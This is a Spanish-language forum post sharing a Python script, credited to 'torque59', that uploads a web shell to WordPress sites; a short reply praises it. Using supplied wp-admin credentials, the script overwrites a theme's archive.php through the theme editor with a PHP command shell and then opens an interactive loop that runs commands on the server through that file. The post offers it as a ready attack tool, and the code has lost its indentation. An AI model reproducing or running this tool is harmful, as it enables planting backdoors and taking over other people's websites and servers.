Hola, les paso a dejar esta tool que permite cargar shells en sitios con wordpress
para cargarlas se necesita el usuario y la pass del wp-admin :D
(http://i.imgur.com/DYZSDQF.png)
#!/usr/bin/env python
#Install mechanize and Beautifulsoup
#easy_install mechanize,BeautifulSoup
#Give full url path to avoid issues
from BeautifulSoup import BeautifulSoup
import mechanize
from django.core.validators import URLValidator
from django.core.exceptions import Validationerror
import urllib2
import sys
import os
def check(main_url):
val = URLValidator(verify_exists=False)
try:
val(main_url)
except Validationerror, e:
print e
br = mechanize.Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
# Give user-agent any shit u want
check = br.open(main_url)
html = check.read()
soup = BeautifulSoup(html)
search = soup.findAll('a',href="http://wordpress.org/")
for i in search:
if i['title'] == "Powered by WordPress":
return(1)
else:
exit(1)
def wp_sucker():
try:
br = mechanize.Browser()
br.set_handle_robots(False)
print "[-] Enter the Worpress Site Login"
main_url = raw_input()
stat = check(main_url)
if stat == 1:
pass
else:
print "[-] Enter a Wordpress Login Page Dumbass "
exit(0)
sys.exit(0)
base_url = main_url.replace('/wp-login.php','')
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
br.open(main_url)
br.select_form(nr=0)
print "[-] Enter UserName "
user_name = raw_input()
print "[-] Enter Password"
password = raw_input()
br.form['log'] = user_name
br.form['pwd'] = password
br.form.find_control('redirect_to').readonly = False
br.form['redirect_to'] = base_url+"/wp-admin/themes.php"
page = br.submit()
new = page.read()
#print html
#page = br.open(base_url+"/wp-admin/themes.php").read()
soup = BeautifulSoup(new)
search = soup.findAll('code')
#print search
#themes = ''
print "[-] Themes Available"
for i in search:
print i.text
print "[-] Select the Theme u would Like to upload the Shell"
theme = raw_input()
if theme == "twentyten":
Theme = "Twenty+Ten"
elif theme == "twentyeleven":
Theme ="Twenty+Eleven"
else:
Theme = theme.title()
url = base_url+"/wp-admin/theme-editor.php?file=/themes/%s/archive.php&theme=%s&dir=theme"%(theme,Theme)
br.open(url)
br.select_form(nr=1)
br.form['newcontent'] = "<?php system($_GET['cmd']) ?>"
br.submit()
print "[-] Shell Has been uploaded? Would like to interact.Enter y to interact"
answer = raw_input()
box = base_url.split('/')[2]
if answer == 'Y' or answer == 'y':
while True:
cmd = raw_input(box+"@box~")
if cmd == "exit":
print "[-] Terminal Exited "
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/%s/archive.php?cmd="%theme
os._exit(0)
#sys.exit(0)
else:
shell_url = base_url+"/wp-content/themes/%s/archive.php?cmd=%s"%(theme,cmd)
page = br.open(shell_url)
print page.read()
else:
print "[-] Shell has Been Uploaded Interact whenever U want"
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/twentyten/archive.php?cmd="
os._exit(0)
#exit(0)
#sys.exit(0)
except KeyboardInterrupt:
print"[-] trl^C Detected Shutting Down"
else:
print "[-] Something has gone wrong,Plse check ur Url or entered username or pass"
print "[-] Shutting Down"
exit()
def main():
print "-------------------------------------------"
print " Wordpress Shell Uploader"
print " Credits to HR,Phaedrus \n"
print " Login and get themes available for Upload"
print " And Uploads a basic cmd shell"
print "-------------------------------------------"
wp_sucker()
# shell_up()
main()
#EOF
#Hoping to add new shit :)
Author del Script: torque59,
un Saludo !
Gran aportazo!!
Aunque prefiero la subida manual :D
Un saludo! :)